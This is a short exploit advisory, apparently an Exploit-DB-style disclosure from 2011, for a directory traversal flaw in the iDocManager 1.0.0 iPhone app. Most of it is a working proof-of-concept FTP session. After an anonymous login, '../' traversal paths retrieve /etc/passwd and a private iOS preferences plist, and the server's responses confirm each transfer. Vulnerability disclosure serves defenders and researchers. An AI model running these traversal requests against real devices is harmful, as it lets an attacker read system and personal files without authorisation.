iDocManager version 1.0.0 for iPhone / iPod Touch suffers from a directory traversal vulnerability.
747557963d406362ded08fd7a7cd6e6045df00ee0ff22a5081d5a7f51a930ac4
# Exploit Title: iDocManager v1.0.0 for iPhone / iPod touch, Directory Traversal
# Date: 02/24/2011
# Author: R3d@l3rt, Sp@2K, Sunlight, H@ckk3y
# Software Link : http://itunes.apple.com/kr/app/idocmanager/id376421606?mt=8
# Version: 1.0.0
# Tested on: iPhone, iPod 3GS with 4.2.1 firmware
# There is directory traversal vulnerability in the iDocManager.
# Exploit Testing
C:\>ftp
ftp> open 192.168.0.70 20000
Connected to 192.168.0.70.
220 DiddyDJ FTP server ready.
User (192.168.0.70:(none)): anonymous
331 Password required for anonymous
Password:
230 User logged in.
ftp> dir
200: PORT command successful.
150: Opening ASCII mode data connection for '/bin/ls'.
226 Transfer complete.
ftp: 4 bytes received in 0.02Seconds 0.25Kbytes/sec.
ftp> get ../../../../../../etc/passwd
200: PORT command successful.
150: Opening BINARY mode data connection for '../../../../../../etc/passwd'.
226 Transfer complete.
ftp: 787 bytes received in 0.02Seconds 49.19Kbytes/sec.
ftp> get ../../../../../../../private/var/mobile/Library/Preferences/com.apple.conference.plist
200: PORT command successful.
150: Opening BINARY mode data connection for '../../../../../../../private/var/mobile/Library/Preferences/com.apple.conference.plist'.
226 Transfer complete.